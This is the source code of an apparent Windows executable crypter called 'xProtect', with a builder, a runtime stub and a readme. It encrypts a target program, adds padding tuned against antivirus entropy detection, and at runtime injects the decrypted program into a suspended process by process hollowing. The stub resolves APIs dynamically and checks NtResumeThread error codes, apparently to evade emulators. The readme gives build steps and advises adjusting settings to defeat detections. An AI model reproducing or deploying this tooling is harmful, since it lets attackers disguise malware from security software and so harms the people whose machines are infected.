123 | HANDLE hFile = CreateFile( L"Crypted.exe", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, 0, 0 );
124 |
125 | if ( hFile == INVALID_HANDLE_VALUE )
126 | return false;
127 |
128 | DWORD dwSize = 0;
129 | BYTE* pFileBuffer = ReadFileToMem( szFilePath, dwSize );
130 | dwFileSize = dwSize;
131 |
132 | if ( !pFileBuffer )
133 | {
134 | CloseHandle( hFile );
135 | return false;
136 | }
137 |
138 | IMAGE_DOS_HEADER stubIDH = { 0 };
139 | IMAGE_NT_HEADERS stubINH = { 0 };
140 | IMAGE_SECTION_HEADER stubISH[2] = { 0 };
141 | DWORD_PTR dwCrypterBase = (DWORD_PTR)GetModuleHandle( NULL );
142 | DWORD dwBytesWritten = 0;
143 |
144 | //warning: using goto can cause dinosaur attacks, use at own risk
145 | //http://i.stack.imgur.com/6C1F5.png
146 |
147 | IMAGE_DOS_HEADER* pFileIDH = (IMAGE_DOS_HEADER*)pFileBuffer;
148 | if ( pFileIDH->e_magic != IMAGE_DOS_SIGNATURE )
149 | {
150 | wprintf( L"Not a PE File.\n" );
151 | goto clean_up;
152 | }
153 |
154 | IMAGE_NT_HEADERS* pFileINH = (IMAGE_NT_HEADERS*)( pFileBuffer + pFileIDH->e_lfanew );
155 | if ( pFileINH->Signature != IMAGE_NT_SIGNATURE )
156 | {
157 | wprintf( L"Not a PE File.\n" );
158 | goto clean_up;
159 | }
160 |
161 | if ( !GetStubSectionInfo( dwCrypterBase ) )
162 | {
163 | wprintf( L"Couldn't find stub code/data section.\n" );
164 | goto clean_up;
165 | }
166 |
167 | GenerateKey();
168 | SIMPLE_ENCRYPT( pFileBuffer, dwSize, bKey, sizeof( bKey ), true );
169 | SIMPLE_ENCRYPT( (BYTE*)( (DWORD)&dwEncryptStartMarker ), ( (DWORD)&dwEncryptEndMarker - (DWORD)&dwEncryptStartMarker ), bKey, sizeof( bKey ), false );
170 |
171 | stubIDH = *(IMAGE_DOS_HEADER*)dwCrypterBase;
172 | if ( stubIDH.e_magic != IMAGE_DOS_SIGNATURE ) //for good measure
173 | goto clean_up;
174 |
175 | stubINH = *(IMAGE_NT_HEADERS*)( dwCrypterBase + stubIDH.e_lfanew );
176 | if ( stubINH.Signature != IMAGE_NT_SIGNATURE ) //for good measure
177 | goto clean_up;
178 |
179 | memset( &stubIDH, 0, sizeof( IMAGE_DOS_HEADER ) );
180 | stubIDH.e_magic = IMAGE_DOS_SIGNATURE;
181 | stubIDH.e_lfanew = sizeof( IMAGE_DOS_HEADER );
182 |
183 | memset( stubINH.OptionalHeader.DataDirectory, 0, sizeof( IMAGE_DATA_DIRECTORY ) * IMAGE_NUMBEROF_DIRECTORY_ENTRIES );
184 |
185 | if ( stubINH.OptionalHeader.DllCharacteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE )
186 | {
187 | wprintf( L"\n************************************************\n" );
188 | wprintf( L"Crypter has been compiled with ASLR, if crypted file doesn't work please turn ASLR off and compile again!\n" );
189 | wprintf( L"************************************************\n" );
190 |
191 | stubINH.OptionalHeader.DllCharacteristics &= ~IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE;
192 | stubINH.FileHeader.Characteristics |= IMAGE_FILE_RELOCS_STRIPPED;
193 | }
194 |
195 | //these will determine how much padding to add to crypted file (in case of entropy based detections, multiple AVs use these kinds of detections)
196 | //every inc_every add inc_multi
197 | const int inc_every = 3;
198 | const int inc_multi = 0; //0 = no increased size, increase this to add more size in case of entropy based detections
199 |
200 | dwSplitMulti = inc_multi;
201 | dwSplitIncrease = inc_every;
202 |
203 | dwPaddedFileSize = CalculateIncreasedSize( dwFileSize, inc_every, inc_multi );
204 |
205 | DWORD dwStubCodeTotal = dwStubCodeSize;
206 | DWORD dwStubDataTotal = dwStubDataSize + dwPaddedFileSize;
207 |
208 | char* szCode = ".text";
209 | char* szData = ".data";
210 |
211 | memcpy( stubISH[0].Name, szCode, strlen( szCode ) );
212 | stubISH[0].PointerToRawData = stubINH.OptionalHeader.SizeOfHeaders;
213 | stubISH[0].SizeOfRawData = Align( dwStubCodeTotal, stubINH.OptionalHeader.FileAlignment );
214 | stubISH[0].VirtualAddress = stubINH.OptionalHeader.SectionAlignment;
215 | stubISH[0].Misc.VirtualSize = dwStubCodeTotal;
216 | stubISH[0].Characteristics = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ;
217 |
218 | memcpy( stubISH[1].Name, szData, strlen( szData ) );
219 | stubISH[1].PointerToRawData = Align( stubISH[0].PointerToRawData + stubISH[0].SizeOfRawData, stubINH.OptionalHeader.FileAlignment );
220 | stubISH[1].SizeOfRawData = Align( dwStubDataTotal, stubINH.OptionalHeader.FileAlignment );
221 | stubISH[1].VirtualAddress = Align( stubISH[0].VirtualAddress + stubISH[0].Misc.VirtualSize, stubINH.OptionalHeader.SectionAlignment );
222 | stubISH[1].Misc.VirtualSize = dwStubDataTotal;
223 | stubISH[1].Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_CNT_INITIALIZED_DATA;
224 |
225 | stubINH.FileHeader.NumberOfSections = 2;
226 | stubINH.OptionalHeader.Subsystem = IMAGE_SUBSYSTEM_WINDOWS_GUI;
227 | stubINH.OptionalHeader.SizeOfInitializedData = 0;
228 | stubINH.OptionalHeader.SizeOfCode = stubISH[0].SizeOfRawData;
229 | stubINH.OptionalHeader.BaseOfData = stubISH[1].VirtualAddress;
230 | stubINH.OptionalHeader.SizeOfImage = Align( stubISH[1].VirtualAddress + stubISH[1].Misc.VirtualSize, stubINH.OptionalHeader.SectionAlignment );
231 | stubINH.OptionalHeader.AddressOfEntryPoint = stubISH[0].VirtualAddress + ( (DWORD_PTR)stub_start - dwStubCodeBase );
232 |
233 | stubINH.OptionalHeader.DataDirectory[1].VirtualAddress = 0x41;
234 |
235 | WriteFile( hFile, &stubIDH, sizeof( IMAGE_DOS_HEADER ), &dwBytesWritten, 0 );
236 | SetFilePointer( hFile, 0, 0, FILE_END );
237 | WriteFile( hFile, &stubINH, sizeof( IMAGE_NT_HEADERS ), &dwBytesWritten, 0 );
238 |
239 | for ( int i = 0; i < stubINH.FileHeader.NumberOfSections; i++ )
240 | {
241 | SetFilePointer( hFile, sizeof( IMAGE_DOS_HEADER ) + sizeof( IMAGE_NT_HEADERS ) + ( sizeof( IMAGE_SECTION_HEADER ) * i ), 0, FILE_BEGIN );
242 | WriteFile( hFile, &stubISH[i], sizeof( IMAGE_SECTION_HEADER ), &dwBytesWritten, 0 );
243 | }
244 |
245 | DWORD dwPadding = stubINH.OptionalHeader.SizeOfHeaders - ( sizeof( IMAGE_DOS_HEADER ) + sizeof( IMAGE_NT_HEADERS ) + ( sizeof( IMAGE_SECTION_HEADER ) * stubINH.FileHeader.NumberOfSections ) );
246 | BYTE* pPadding = (BYTE*)VirtualAlloc( NULL, dwPadding, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
247 | if ( !pPadding )
248 | goto clean_up;
249 |
250 | memset( pPadding, 0, dwPadding );
251 | SetFilePointer( hFile, 0, 0, FILE_END );
252 | WriteFile( hFile, pPadding, dwPadding, &dwBytesWritten, 0 );
253 | VirtualFree( pPadding, 0, MEM_RELEASE );
254 |
255 | BYTE* pStubCode = (BYTE*)VirtualAlloc( NULL, dwStubCodeTotal, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
256 | if ( !pStubCode )
257 | goto clean_up;
258 |
259 | memset( pStubCode, 0, dwStubCodeTotal );
260 | memcpy( pStubCode, (void*)dwStubCodeBase, dwStubCodeSize );
261 |
262 | FixAddress( pStubCode, dwStubCodeSize, dwStubDataBase, stubINH.OptionalHeader.ImageBase + stubISH[1].VirtualAddress );
263 |
264 | SetFilePointer( hFile, 0, 0, FILE_END );
265 | WriteFile( hFile, pStubCode, stubISH[0].SizeOfRawData, &dwBytesWritten, 0 );
266 | VirtualFree( pStubCode, 0, MEM_RELEASE );
267 |
268 | BYTE* pStubData = (BYTE*)VirtualAlloc( NULL, stubISH[1].SizeOfRawData, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
269 | if ( !pStubData )
270 | goto clean_up;
271 |
272 | memset( pStubData, 0, stubISH[1].SizeOfRawData );
273 | memcpy( pStubData, (void*)dwStubDataBase, dwStubDataSize );
274 |
275 | InFile( pFileBuffer, (BYTE*)( pStubData + dwStubDataSize ), dwSize, inc_every, inc_multi );
276 |
277 | SetFilePointer( hFile, 0, 0, FILE_END );
278 | WriteFile( hFile, pStubData, stubISH[1].SizeOfRawData, &dwBytesWritten, 0 );
279 |
280 | VirtualFree( pStubData, 0, MEM_RELEASE );
281 |
282 | bReturn = true;
283 | clean_up:
284 | CloseHandle( hFile );
285 | VirtualFree( pFileBuffer, 0, MEM_RELEASE );
286 |
287 | return bReturn;
288 | }
--------------------------------------------------------------------------------
/xProtect Source/build.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | bool CryptFile( WCHAR* szFilePath );
--------------------------------------------------------------------------------
/xProtect Source/main.cpp:
--------------------------------------------------------------------------------
1 | #define _WIN32_WINNT _WIN32_WINNT_WINXP
2 |
3 | #include
4 | #include
5 | #include
6 |
7 | #include "build.h"
8 | #include "stub.h"
9 |
10 | int _tmain( int argc, wchar_t* argv[] )
11 | {
12 | if ( argc < 2 )
13 | {
14 | wprintf( L"\n************************************************\n" );
15 | wprintf( L"ERROR: Not enough parameters!\n" );
16 | wprintf( L"Format: %s file_to_crypt.exe\n", argv[0] );
17 | wprintf( L"************************************************\n" );
18 | return 0;
19 | }
20 |
21 | DWORD dwFileAttributes = GetFileAttributes( argv[1] );
22 |
23 | if ( dwFileAttributes == INVALID_FILE_ATTRIBUTES )
24 | {
25 | int iError = GetLastError();
26 | wprintf( L"\n************************************************\n" );
27 | wprintf( L"ERROR: GetLastError(): 0x%X!\n", iError );
28 | wprintf( L"Format: %s file_to_crypt.exe\n", argv[0] );
29 | wprintf( L"************************************************\n" );
30 | return 0;
31 | }
32 |
33 | srand( GetTickCount() );
34 |
35 | if ( CryptFile( argv[1] ) )
36 | {
37 | wprintf( L"\n\n************************************************\n" );
38 | wprintf( L"File successfully crypted!\n" );
39 | wprintf( L"************************************************\n" );
40 | }
41 | else
42 | {
43 | wprintf( L"\n\n************************************************\n" );
44 | wprintf( L"Failed to crypt file!\n" );
45 | wprintf( L"************************************************\n" );
46 | }
47 |
48 | system( "pause" );
49 |
50 | return 0;
51 | }
--------------------------------------------------------------------------------
/xProtect Source/readme.txt:
--------------------------------------------------------------------------------
1 | make new EMPTY console project in VS2008 (any other should work), put .cpp .h files in the folder they're supposed to be in
2 | drag & drop/add the .cpp .h files onto the project
3 | compile in VS2008 in release mode with settings from sample_settings.png
4 |
5 | adjust modifiers in build.cpp in case of entropy detections
6 | any API called in stub needs to be imported dynamically
7 |
8 | Nemesis loves you all
--------------------------------------------------------------------------------
/xProtect Source/stub.cpp:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | DWORD_PTR pGetProcAddress( void* pDLL, char* szAPI );
4 | wchar_t* GetCurrentFilePath();
5 | void* GetKernel32Base();
6 | void* GetNtdllBase();
7 | void RunFile( BYTE* pFile );
8 | void SIMPLE_ENCRYPT( BYTE* pBuffer, DWORD dwLen, BYTE* bKey, DWORD dwKeyLen, bool bSkip );
9 | DWORD Align( DWORD dwVal, DWORD dwAlignment );
10 | BYTE* GetFile( DWORD dwStartAddr, DWORD dwSize, int inc_every, int inc_multi );
11 |
12 | int sc_strcmp( const char* _Str1, const char* _Str2 );
13 | void* sc_memcpy( void* _Dst, const void* _Src, size_t _Size );
14 | void* sc_memset( void* _Dst, int Val, size_t _Size );
15 | wchar_t* sc_wcscpy(wchar_t * str1,const wchar_t * str2);
16 |
17 | #pragma comment( linker, "/section:.stubd,EWRS" )
18 | #pragma data_seg( push, ".stubd" )
19 |
20 | wchar_t* szCurrentFilePath = NULL;
21 |
22 | DWORD dwFileSize = 0;
23 | DWORD dwPaddedFileSize = 0;
24 |
25 | DWORD dwSplitMulti = 0;
26 | DWORD dwSplitIncrease = 0;
27 |
28 | DWORD dwEncryptStartMarker = 0;
29 | char szVirtualAlloc[] = "VirtualAlloc";
30 | char szVirtualFree[] = "VirtualFree";
31 | char szExitProcess[] = "ExitProcess";
32 | char szCreateProcessW[] = "CreateProcessW";
33 | char szGetThreadContext[] = "GetThreadContext";
34 | char szSetThreadContext[] = "SetThreadContext";
35 | char szReadProcessMemory[] = "ReadProcessMemory";
36 | char szWriteProcessMemory[] = "WriteProcessMemory";
37 | char szVirtualAllocEx[] = "VirtualAllocEx";
38 | char szResumeThread[] = "ResumeThread";
39 | char szNtUnmapViewOfSection[] = "NtUnmapViewOfSection";
40 | DWORD dwEncryptEndMarker = 0;
41 |
42 | char szGetProcAddress[] = "GetProcAddress";
43 | char szNtResumeThread[] = "NtResumeThread";
44 |
45 | BOOL (WINAPI * pCreateProcessW)(
46 | LPCWSTR lpApplicationName,
47 | LPWSTR lpCommandLine,
48 | LPSECURITY_ATTRIBUTES lpProcessAttributes,
49 | LPSECURITY_ATTRIBUTES lpThreadAttributes,
50 | BOOL bInheritHandles,
51 | DWORD dwCreationFlags,
52 | LPVOID lpEnvironment,
53 | LPCWSTR lpCurrentDirectory,
54 | LPSTARTUPINFOW lpStartupInfo,
55 | LPPROCESS_INFORMATION lpProcessInformation ) = NULL;
56 |
57 | LPVOID (WINAPI * pVirtualAlloc)( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect ) = NULL;
58 | BOOL (WINAPI * pVirtualFree)( LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType ) = NULL;
59 | VOID (WINAPI * pExitProcess)( UINT uExitCode ) = NULL;
60 | BOOL (WINAPI * pGetThreadContext)( HANDLE hThread, LPCONTEXT lpContext ) = NULL;
61 | BOOL (WINAPI * pSetThreadContext)( HANDLE hThread, CONST CONTEXT *lpContext ) = NULL;
62 | BOOL (WINAPI * pReadProcessMemory)( HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesRead ) = NULL;
63 | BOOL (WINAPI * pWriteProcessMemory)( HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten ) = NULL;
64 | LPVOID (WINAPI * pVirtualAllocEx)( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect ) = NULL;
65 | DWORD (WINAPI * pResumeThread)( HANDLE hThread ) = NULL;
66 | LONG (NTAPI * pNtUnmapViewOfSection)( HANDLE ProcessHandle, PVOID BaseAddress ) = NULL;
67 | FARPROC (WINAPI * real_GetProcAddress)( HMODULE hModule, LPCSTR lpProcName ) = NULL;
68 | NTSTATUS (NTAPI * pNtResumeThread)( HANDLE ThreadHandle, PULONG SuspendCount ) = NULL;
69 |
70 | BYTE bKey[30] = { 0 };
71 |
72 | DWORD bFileMarker = 0;
73 |
74 | #pragma data_seg( pop )
75 |
76 | #pragma comment( linker, "/section:.stubc,EWRS" )
77 | #pragma code_seg( push, ".stubc" )
78 |
79 | void stub_start()
80 | {
81 | void* pKernel32Base = GetKernel32Base();
82 | void* pNtdllBase = GetNtdllBase();
83 |
84 | *(DWORD_PTR*)&real_GetProcAddress = pGetProcAddress( pKernel32Base, szGetProcAddress );
85 | *(DWORD_PTR*)&pNtResumeThread = (DWORD_PTR)real_GetProcAddress( (HMODULE)pNtdllBase, szNtResumeThread );
86 |
87 | LONG lNtStatus = pNtResumeThread( 0, 0 );
88 | if ( lNtStatus != 0xC0000008 )
89 | return;
90 |
91 | lNtStatus = pNtResumeThread( (HANDLE)-1, (PULONG)-1 );
92 | if ( lNtStatus != 0xC0000005 )
93 | return;
94 |
95 | SIMPLE_ENCRYPT( (BYTE*)&dwEncryptStartMarker, ( (DWORD)&dwEncryptEndMarker - (DWORD)&dwEncryptStartMarker ), bKey, sizeof( bKey ), false );
96 |
97 | *(DWORD_PTR*)&pVirtualAlloc = pGetProcAddress( pKernel32Base, szVirtualAlloc );
98 | *(DWORD_PTR*)&pVirtualFree = pGetProcAddress( pKernel32Base, szVirtualFree );
99 | *(DWORD_PTR*)&pExitProcess = pGetProcAddress( pKernel32Base, szExitProcess );
100 | *(DWORD_PTR*)&pCreateProcessW = pGetProcAddress( pKernel32Base, szCreateProcessW );
101 | *(DWORD_PTR*)&pGetThreadContext = pGetProcAddress( pKernel32Base, szGetThreadContext );
102 | *(DWORD_PTR*)&pSetThreadContext = pGetProcAddress( pKernel32Base, szSetThreadContext );
103 | *(DWORD_PTR*)&pReadProcessMemory = pGetProcAddress( pKernel32Base, szReadProcessMemory );
104 | *(DWORD_PTR*)&pWriteProcessMemory = pGetProcAddress( pKernel32Base, szWriteProcessMemory );
105 | *(DWORD_PTR*)&pVirtualAllocEx = pGetProcAddress( pKernel32Base, szVirtualAllocEx );
106 | *(DWORD_PTR*)&pResumeThread = pGetProcAddress( pKernel32Base, szResumeThread );
107 |
108 | *(DWORD_PTR*)&pNtUnmapViewOfSection = (DWORD_PTR)real_GetProcAddress( (HMODULE)pNtdllBase, szNtUnmapViewOfSection );
109 |
110 |
111 | DWORD dwFileStart = (DWORD)( &bFileMarker ) + sizeof( DWORD );
112 | BYTE* pFile = GetFile( dwFileStart, dwFileSize, dwSplitIncrease, dwSplitMulti );
113 | SIMPLE_ENCRYPT( pFile, dwFileSize, bKey, sizeof( bKey ), true );
114 |
115 | szCurrentFilePath = (wchar_t*)pVirtualAlloc( NULL, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
116 | wchar_t* szTempPath = GetCurrentFilePath();
117 | sc_wcscpy( szCurrentFilePath, szTempPath );
118 |
119 | RunFile( pFile );
120 |
121 | pVirtualFree( szCurrentFilePath, 0, MEM_RELEASE );
122 | pVirtualFree( pFile, 0, MEM_RELEASE );
123 | pExitProcess( 0 );
124 | }
125 |
126 | void RunFile( BYTE* pFile )
127 | {
128 | IMAGE_DOS_HEADER* pIDH = (IMAGE_DOS_HEADER*)pFile;
129 | if ( pIDH->e_magic != IMAGE_DOS_SIGNATURE )
130 | return;
131 |
132 | IMAGE_NT_HEADERS* pINH = (IMAGE_NT_HEADERS*)( pFile + pIDH->e_lfanew );
133 | if ( pINH->Signature != IMAGE_NT_SIGNATURE )
134 | return;
135 |
136 | IMAGE_SECTION_HEADER* pISH = IMAGE_FIRST_SECTION( pINH );
137 |
138 | STARTUPINFOW si;
139 | PROCESS_INFORMATION pi;
140 |
141 | sc_memset( &si, 0, sizeof( STARTUPINFO ) );
142 | sc_memset( &pi, 0, sizeof( PROCESS_INFORMATION ) );
143 |
144 | if ( !pCreateProcessW( szCurrentFilePath, 0, 0, 0, FALSE, CREATE_SUSPENDED, 0, 0, &si, &pi ) )
145 | return;
146 |
147 | CONTEXT* pContext = (CONTEXT*)pVirtualAlloc( NULL, sizeof( CONTEXT ), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
148 | pContext->ContextFlags = CONTEXT_FULL;
149 |
150 | if ( !pGetThreadContext( pi.hThread, pContext ) )
151 | return;
152 |
153 | DWORD dwImageBase = 0;
154 | if ( !pReadProcessMemory( pi.hProcess, (LPCVOID)( pContext->Ebx + 8 ), &dwImageBase, sizeof( DWORD ), 0 ) )
155 | return;
156 |
157 | if ( dwImageBase == pINH->OptionalHeader.ImageBase )
158 | pNtUnmapViewOfSection( pi.hProcess, (PVOID)dwImageBase );
159 |
160 | BYTE* pTarget = (BYTE*)pVirtualAllocEx( pi.hProcess, (LPVOID)dwImageBase, pINH->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
161 | if ( !pTarget )
162 | return;
163 |
164 | //add more error checking if wanted but it's a bit redundant in stubs since it will just exit instead of crash
165 | //can remove most error checking in stub if dont care about crashing (instead of exit) in case something goes wrong somewhere
166 | pWriteProcessMemory( pi.hProcess, pTarget, pFile, pINH->OptionalHeader.SizeOfHeaders, 0 );
167 |
168 | for ( int i = 0; i < pINH->FileHeader.NumberOfSections; i++ )
169 | pWriteProcessMemory( pi.hProcess, (LPVOID)( pTarget + pISH[i].VirtualAddress ), (LPCVOID)( pFile + pISH[i].PointerToRawData ), pISH[i].SizeOfRawData, 0 );
170 |
171 | pWriteProcessMemory( pi.hProcess, (LPVOID)( pContext->Ebx + 8 ), &pINH->OptionalHeader.ImageBase, sizeof( DWORD ), 0 );
172 | pContext->Eax = (DWORD)( pTarget + pINH->OptionalHeader.AddressOfEntryPoint );
173 | pSetThreadContext( pi.hThread, pContext );
174 | pResumeThread( pi.hThread );
175 | }
176 |
177 | DWORD_PTR pGetProcAddress( void* pDLL, char* szAPI )
178 | {
179 | if ( !pDLL )
180 | return 0;
181 |
182 | IMAGE_DOS_HEADER* pIDH = (IMAGE_DOS_HEADER*)pDLL;
183 | if ( pIDH->e_magic != IMAGE_DOS_SIGNATURE )
184 | return 0;
185 |
186 | IMAGE_NT_HEADERS* pINH = (IMAGE_NT_HEADERS*)( (BYTE*)pDLL + pIDH->e_lfanew );
187 | if ( pINH->Signature != IMAGE_NT_SIGNATURE )
188 | return 0;
189 |
190 | IMAGE_EXPORT_DIRECTORY* pIED = (IMAGE_EXPORT_DIRECTORY*)( (BYTE*)pDLL + pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress );
191 | DWORD* dwFunctions = (DWORD*)( (BYTE*)pDLL + pIED->AddressOfFunctions );
192 | WORD* wNameOrdinals = (WORD*)( (BYTE*)pDLL + pIED->AddressOfNameOrdinals );
193 | DWORD* dwNames = (DWORD*)( (BYTE*)pDLL + pIED->AddressOfNames );
194 |
195 | for ( unsigned int i = 0; i < pIED->NumberOfNames; i++ )
196 | {
197 | if ( !sc_strcmp( (char*)( (BYTE*)pDLL + dwNames[i] ), szAPI ) )
198 | return (DWORD_PTR)( (BYTE*)pDLL + dwFunctions[wNameOrdinals[i]] );
199 | }
200 |
201 | return 0;
202 | }
203 |
204 | wchar_t* GetCurrentFilePath()
205 | {
206 | wchar_t* szExeName = NULL;
207 |
208 | __asm
209 | {
210 | mov eax, fs:[0x30]
211 | mov eax, [eax + 0x10]
212 | mov eax, [eax + 0x3C]
213 | mov szExeName, eax
214 | }
215 |
216 | return szExeName;
217 | }
218 |
219 | void* GetKernel32Base()
220 | {
221 | void* kernel32base = NULL;
222 |
223 | __asm
224 | {
225 | mov eax, fs:[0x30]
226 | mov eax, [eax + 0xC]
227 | mov eax, [eax + 0xC]
228 | mov eax, [eax]
229 | mov eax, [eax]
230 | mov eax, [eax + 0x18]
231 | mov kernel32base, eax
232 | }
233 |
234 | return kernel32base;
235 | }
236 |
237 | void* GetNtdllBase()
238 | {
239 | void* ntdllbase = NULL;
240 |
241 | __asm
242 | {
243 | mov eax, fs:[0x30]
244 | mov eax, [eax + 0xC]
245 | mov eax, [eax + 0xC]
246 | mov eax, [eax]
247 | mov eax, [eax + 0x18]
248 | mov ntdllbase, eax
249 | }
250 |
251 | return ntdllbase;
252 | }
253 |
254 | void SIMPLE_ENCRYPT( BYTE* pBuffer, DWORD dwLen, BYTE* bKey, DWORD dwKeyLen, bool bSkip )
255 | {
256 | int a = 0;
257 | int b = 0;
258 | int d = 0;
259 | int c = 0;
260 |
261 | //skip encrypting once every 3rd byte, this is to reduce entropy, should not affect detections
262 | int inc_every = 3;
263 |
264 | for ( unsigned int i = 0; i < dwLen; i++ )
265 | {
266 | if ( bSkip && i % inc_every )
267 | continue;
268 |
269 | if ( d == dwKeyLen )
270 | d = 0;
271 | else
272 | d++;
273 |
274 | a = pBuffer[i];
275 | b = bKey[d];
276 |
277 | for ( c = 0; c < 255; c++ )
278 | a ^= c;
279 |
280 | pBuffer[i] = a ^ b;
281 | }
282 | }
283 |
284 | DWORD Align( DWORD dwVal, DWORD dwAlignment )
285 | {
286 | DWORD dwResult = dwVal;
287 |
288 | if ( dwAlignment )
289 | {
290 | if ( dwVal % dwAlignment )
291 | dwResult = ( dwVal + dwAlignment ) - ( dwVal % dwAlignment );
292 | }
293 |
294 | return dwResult;
295 | }
296 |
297 | BYTE* GetFile( DWORD dwStartAddr, DWORD dwSize, int inc_every, int inc_multi )
298 | {
299 | BYTE* pFile = (BYTE*)pVirtualAlloc( NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
300 |
301 | int temp_inc = 0;
302 |
303 | for ( unsigned int i = 0; i < dwSize; i++ )
304 | {
305 | *(BYTE*)( pFile + i ) = *(BYTE*)( dwStartAddr + temp_inc );
306 | temp_inc++;
307 |
308 | if ( i % inc_every == 0 )
309 | temp_inc += inc_multi;
310 | }
311 |
312 | return pFile;
313 | }
314 |
315 | /* generic functions that would normally be in the CRT however we cant use that here */
316 | int sc_strcmp( const char* _Str1, const char* _Str2 )
317 | {
318 | int ret = 0;
319 |
320 | while (!(ret = *(unsigned char *)_Str1 - *(unsigned char *)_Str2) && *_Str2)
321 | ++_Str1, ++_Str2;
322 |
323 | if (ret < 0)
324 | ret = -1;
325 | else if (ret > 0)
326 | ret = 1 ;
327 |
328 | return ret;
329 | }
330 |
331 | void* sc_memcpy( void* _Dst, const void* _Src, size_t _Size )
332 | {
333 | void* ret = _Dst;
334 |
335 | while (_Size--)
336 | {
337 | *(BYTE*)_Dst = *(BYTE*)_Src;
338 | _Dst = (BYTE*)_Dst + 1;
339 | _Src = (BYTE*)_Src + 1;
340 | }
341 |
342 | return ret;
343 | }
344 |
345 | //turn off optimizations due to some compiler bug
346 | #pragma optimize( "", off )
347 | void* sc_memset( void* _Dst, int Val, size_t _Size )
348 | {
349 | BYTE *pb = (BYTE*)_Dst;
350 | BYTE *pbend = pb + _Size;
351 | while (pb != pbend)
352 | *pb++ = Val;
353 | return _Dst;
354 | }
355 | #pragma optimize( "", on )
356 |
357 | wchar_t* sc_wcscpy(wchar_t * str1,const wchar_t * str2)
358 | {
359 | wchar_t *save = str1;
360 |
361 | for (; (*str1 = *str2); ++str2, ++str1);
362 | return save;
363 | }
364 |
365 | #pragma code_seg( pop )
--------------------------------------------------------------------------------
/xProtect Source/stub.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include
4 |
5 | extern BYTE bKey[30];
6 | extern DWORD dwFileSize;
7 | extern DWORD dwPaddedFileSize;
8 |
9 | extern DWORD dwSplitMulti;
10 | extern DWORD dwSplitIncrease;
11 |
12 | extern DWORD dwEncryptEndMarker;
13 | extern DWORD dwEncryptStartMarker;
14 |
15 | void stub_start();
16 |
17 | void SIMPLE_ENCRYPT( BYTE* pBuffer, DWORD dwLen, BYTE* bKey, DWORD dwKeyLen, bool bSkip );
18 | DWORD Align( DWORD dwVal, DWORD dwAlignment );
--------------------------------------------------------------------------------